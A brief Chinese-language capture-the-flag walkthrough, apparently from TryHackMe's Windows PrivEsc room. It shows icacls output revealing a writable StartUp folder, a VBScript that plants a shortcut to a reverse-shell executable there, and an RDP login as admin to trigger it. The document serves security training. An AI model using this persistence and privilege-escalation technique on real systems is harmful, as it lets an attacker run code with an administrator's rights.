查看 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp权限

    1. C:\Users\user>icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
    2. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp BUILTIN\Users:(OI)(CI)(F)
    3.                                                              WIN-QBA94KB3IOF\Administrator:(I)(OI)(CI)(DE,DC)
    4.                                                              WIN-QBA94KB3IOF\admin:(I)(OI)(CI)(DE,DC)
    5.                                                              NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    6.                                                              BUILTIN\Administrators:(I)(OI)(CI)(F)
    7.                                                              BUILTIN\Users:(I)(OI)(CI)(RX)
    8.                                                              Everyone:(I)(OI)(CI)(RX)
    10. Successfully processed 1 files; Failed processing 0 files

    我们使用一个脚本在 StartUp目录创建一个指向我们的可执行恶意文件的快捷方式

    1. cscript C:\PrivEsc\CreateShortcut.vbs
    1. Set oWS = WScript.CreateObject("WScript.Shell")
    2. sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
    3. Set oLink = oWS.CreateShortcut(sLinkFile)
    4. oLink.TargetPath = "C:\PrivEsc\reverse.exe"
    5. oLink.Save

    然后开启监听并使用 RDP 进行登录:

    1. rdesktop -u admin 10.10.21.109

    TryHackMe | Windows PrivEsc